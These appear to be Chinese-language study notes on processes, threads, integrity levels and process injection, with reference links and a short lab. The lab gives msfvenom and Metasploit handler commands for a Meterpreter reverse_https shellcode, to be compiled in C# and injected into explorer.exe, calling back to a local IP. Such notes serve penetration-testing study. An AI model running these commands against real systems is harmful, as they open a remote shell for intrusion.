进程和线程的区别
https://segmentfault.com/a/1190000039297639
进程,线程 (公司)(人) 卖食品、饮料、医疗、交通、房地产公司 进程里有多个线程,就像一个公司里有多个员工
直接反弹shell的缺点:
- 进程注入的目的
进程的权限控制Integrity Level
https://blog.csdn.net/vlily/article/details/47338327
plist查看进程中的线程
https://docs.microsoft.com/en-us/sysinternals/downloads/pslist
为什么直接杀死线程是不好的
https://blog.csdn.net/shenya1314/article/details/59057361
小实验
c sharp + shellcode编译,注入进程explorer.exe
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.123.138 lport=2333 -f csharp
handler -H 192.168.123.138 -P 2333 -p windows/x64/meterpreter/reverse_https
“C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\MSBuild\Current\Bin\Roslyn\csc.exe” /unsafe /platform:x64 1.cs
1 |
|